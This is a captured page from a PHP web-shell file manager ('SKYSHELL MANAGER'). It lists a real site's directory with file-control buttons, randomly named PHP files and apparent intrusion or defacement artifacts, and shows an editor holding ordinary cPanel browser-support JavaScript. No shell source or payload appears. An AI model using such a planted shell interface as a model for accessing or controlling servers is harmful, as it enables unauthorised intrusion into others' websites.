📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: browser-min.js
(function(window){var YAHOO=window.YAHOO,CPANEL=window.CPANEL;var BROWSER_SUPPORT={file_api:{android:[[/^2\.3/,"Firefox","Opera"]],macintosh:[[/^10\.6/,"Chrome","Firefox","Opera"],[/^10\.7/,"Chrome","Firefox","Opera","Safari"]],windows:[[/^(?:6\.0|5\.[1-9])/,"Chrome","Firefox","Opera"],[/^6\.1/,"Chrome","Firefox","Internet Explorer","Opera"]]}};function _parse_ua_data(){var YAHOO_ENV_UA=YAHOO.env.ua;var client_os=YAHOO_ENV_UA.os;var client_os_version;if(client_os){var client_appstring=YAHOO_ENV_UA.gecko?navigator.oscpu:navigator.appVersion;switch(client_os){case"windows":client_os_version=client_appstring.match(/Windows\s+NT\s+([^;]+)/);break;case"macintosh":client_os_version=client_appstring.match(/Mac\s+OS\s+(?:X\s+)?([\d._]+)/);break}if(client_os_version){client_os_version=client_os_version[1].replace(/_/g,".")}}else{if(YAHOO_ENV_UA.android){client_os="android";client_os_version=YAHOO_ENV_UA.android}else if(YAHOO_ENV_UA.ios){client_os="ios";client_os_version=YAHOO_ENV_UA.ios}}return{os:client_os,os_version:client_os_version}}function _shuffle_array(array){for(var i=array.length-1;i>0;i--){var j=Math.floor(Math.random()*(i+1));var temp=array[i];array[i]=array[j];array[j]=temp}return array}function _get_browser_support_options(features){var feature_browsers;var os_info=_parse_ua_data();var client_os=os_info.os;var client_os_version=os_info.os_version;if(client_os){if(typeof features==="string"){features=[features]}features.forEach((function(feature){var possibilities=BROWSER_SUPPORT[feature]&&BROWSER_SUPPORT[feature][client_os];if(possibilities){possibilities.forEach((function(poss){var ptest=poss[0];if(ptest instanceof RegExp){if(!ptest.test(client_os_version)){return}}else if(ptest instanceof Function){if(!ptest(client_os_version)){return}}if(feature_browsers){for(var browser in feature_browsers){if(poss.indexOf(browser)===-1){delete feature_browsers[browser]}}}else{feature_browsers={};poss.slice(1).forEach((function(browser){feature_browsers[browser]=true}))}}))}}))}return feature_browsers&&Object.keys(feature_browsers)}function get_browser_support_message(features){var feature_browsers=_get_browser_support_options(features);var os_notice;if(feature_browsers){feature_browsers=_shuffle_array(feature_browsers);if(feature_browsers.length===1){os_notice=LOCALE.maketext("Try this page with the latest available version for your platform of “[_1]”",feature_browsers[0])}else{os_notice=LOCALE.maketext("Load this page with the latest available version for your platform of one of these web [numerate,_1,browser,browsers]: [join,~, ,_2]",feature_browsers.length,feature_browsers)}}return os_notice||LOCALE.maketext("Load this page with a newer web browser. (You may need to use another device.)")}CPANEL.browser={NO_SUPPORT_MESSAGE:LOCALE.maketext("Your web browser lacks support for a feature that this page requires."),get_browser_support_message:get_browser_support_message,_get_browser_support_options:_get_browser_support_options}})(window);
Save